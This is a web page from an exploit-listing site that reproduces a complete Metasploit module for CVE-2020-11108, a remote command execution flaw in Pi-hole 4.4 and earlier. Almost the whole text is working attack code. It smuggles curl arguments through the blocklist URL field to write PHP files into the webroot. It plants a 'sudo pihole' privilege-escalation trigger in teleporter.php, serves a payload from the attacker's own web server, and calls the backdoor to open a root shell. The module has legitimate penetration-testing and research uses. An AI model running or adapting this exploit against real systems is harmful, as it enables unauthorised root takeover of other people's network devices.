Registerpihole heisenbergcompensator blocklist os command execution (metasploit)
▸▸▸ Exploit & Vulnerability >> remote exploit & php vulnerability
Online Vulnerability Scanner Tools
Code...
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => 'Pi-Hole heisenbergCompensator Blocklist OS Command Execution', 'Description' => %q{ This exploits a command execution in Pi-Hole <= 4.4. A new blocklist is added, and then an update is forced (gravity) to pull in the blocklist content. PHP content is then written to a file within the webroot. Phase 1 writes a sudo pihole command to launch teleporter, effectively running a priv esc. Phase 2 writes our payload to teleporter.php, overwriting, the content. Lastly, the phase 1 PHP file is called in the web root, which launches our payload in teleporter.php with root privileges. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Nick Frichette' # original PoC, discovery ], 'References' => [ ['EDB', '48443'], ['EDB', '48442'], ['URL', 'https://frichetten.com/blog/cve-2020-11108-pihole-rce/'], ['URL', 'https://github.com/frichetten/CVE-2020-11108-PoC'], ['CVE', '2020-11108'] ], 'Platform' => ['php'], 'Privileged' => true, 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Automatic Target', {}] ], 'DisclosureDate' => 'May 10 2020', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES], 'Reliability' => [REPEATABLE_SESSION] } ) ) # set the default port, and a URI that a user can set if the app isn't installed to the root register_options( [ Opt::RPORT(80), OptPort.new('SRVPORT', [true, 'Web Server Port, must be 80', 80]), OptString.new('PASSWORD', [ false, 'Password for Pi-Hole interface', '']), OptString.new('TARGETURI', [ true, 'The URI of the Pi-Hole Website', '/']) ] ) end def setup super @stage = 0 end def on_request_uri(cli, request) if request.method == 'GET' vprint_status('Received GET request. Responding') send_response(cli, rand_text_alphanumeric(5..10)) return end case @stage when 0 vprint_status('(1/2) Sending priv esc trigger') send_response(cli, %q{<?php shell_exec("sudo pihole -a -t") ?>}) @stage += 1 when 1 vprint_status('(2/2) Sending root payload') send_response(cli, payload.encoded) @stage = 0 else send_response(cli, rand_text_alphanumeric(5..10)) vprint_status("Server received default request for #{request.uri}") end end def check begin res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'admin', 'index.php'), 'method' => 'GET' ) fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if res.code != 200 # <b>Pi-hole Version <\/b> v4.3.2 <b> # <b>Pi-hole Version </b> v4.3.2 <a class="alert-link lookatme" href="https://github.com/pi-hole/pi-hole/releases" target="_blank">(Update available!)</a> <b> %r{<b>Pi-hole Version\s*</b>\s*v?(?<version>[\d\.]+).*<b>} =~ res.body if version && Gem::Version.new(version) <= Gem::Version.new('4.4') vprint_good("Version Detected: #{version}") return CheckCode::Appears else vprint_bad("Version Detected: #{version}") return CheckCode::Safe end rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") end CheckCode::Safe end def add_blocklist(file, token, cookie) # according to the writeup, if you have a port, the colon gets messed up in the encoding. # also, looks like if you have a path (/file.php), it won't trigger either, or the / gets # messed with. data = { 'newuserlists' => %(http://#{datastore['SRVHOST']}#" -o #{file} -d "), 'field' => 'adlists', 'token' => token, 'submit' => 'saveupdate' } send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'admin', 'settings.php'), 'method' => 'POST', 'cookie' => cookie, 'vars_get' => { 'tab' => 'blocklists' }, 'data' => data.to_query ) end def update_gravity(cookie) vprint_status('Forcing gravity pull') send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'admin', 'scripts', 'pi-hole', 'php', 'gravity.sh.php'), 'cookie' => cookie ) end def execute_shell(backdoor_name, cookie) vprint_status('Popping root shell') send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'admin', 'scripts', 'pi-hole', 'php', backdoor_name), 'cookie' => cookie ) end def login(cookie) vprint_status('Login required, attempting login.') send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'admin', 'settings.php'), 'cookie' => cookie, 'vars_get' => { 'tab' => 'blocklists' }, 'vars_post' => { 'pw' => datastore['PASSWORD'] }, 'method' => 'POST' ) end def exploit if check != CheckCode::Appears fail_with(Failure::NotVulnerable, 'Target is not vulnerable') end if datastore['SRVPORT'] != 80 fail_with(Failure::BadConfig, 'SRVPORT must be set to 80 for exploitation to be successful') end if datastore['SRVHOST'] == '0.0.0.0' fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful') end start_service({ 'Uri' => { 'Proc' => proc do |cli, req| on_request_uri(cli, req) end, 'Path' => '/' } }) begin # get cookie res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'admin', 'index.php') ) cookie = res.get_cookies print_status("Using cookie: #{cookie}") # get token res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'admin', 'settings.php'), 'cookie' => cookie, 'vars_get' => { 'tab' => 'blocklists' } ) # check if we got hit by a login prompt if res && res.body.include?('Sign in to start your session') res = login(cookie) end if res && res.body.include?('Sign in to start your session') fail_with(Failure::BadConfig, 'Incorrect Password') end # <input type="hidden" name="token" value="t51q3YuxWT873Nn+6lCyMG4Lg840gRCgu03akuXcvTk="> # may also include / %r{name="token" value="(?<token>[\w+=/]+)">} =~ res.body unless token fail_with(Failure::UnexpectedReply, 'Unable to find token') end print_status("Using token: #{token}") # plant backdoor backdoor_name = "#{rand_text_alphanumeric 5..10}.php" register_file_for_cleanup backdoor_name print_status('Adding backdoor reference') add_blocklist(backdoor_name, token, cookie) # update gravity update_gravity(cookie) if @stage == 0 print_status('Sending 2nd gravity update request.') update_gravity(cookie) end # plant root upgrade print_status('Adding root reference') add_blocklist('teleporter.php', token, cookie) # update gravity update_gravity(cookie) if @stage == 1 print_status('Sending 2nd gravity update request.') update_gravity(cookie) end # pop shell execute_shell(backdoor_name, cookie) print_status("Blocklists must be removed manually from #{normalize_uri(target_uri.path, 'admin', 'settings.php')}?tab=blocklists") rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") end end end
Pihole heisenbergcompensator blocklist os command execution (metasploit) Vulnerability / Exploit Source : Pihole heisenbergcompensator blocklist os command execution (metasploit)
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes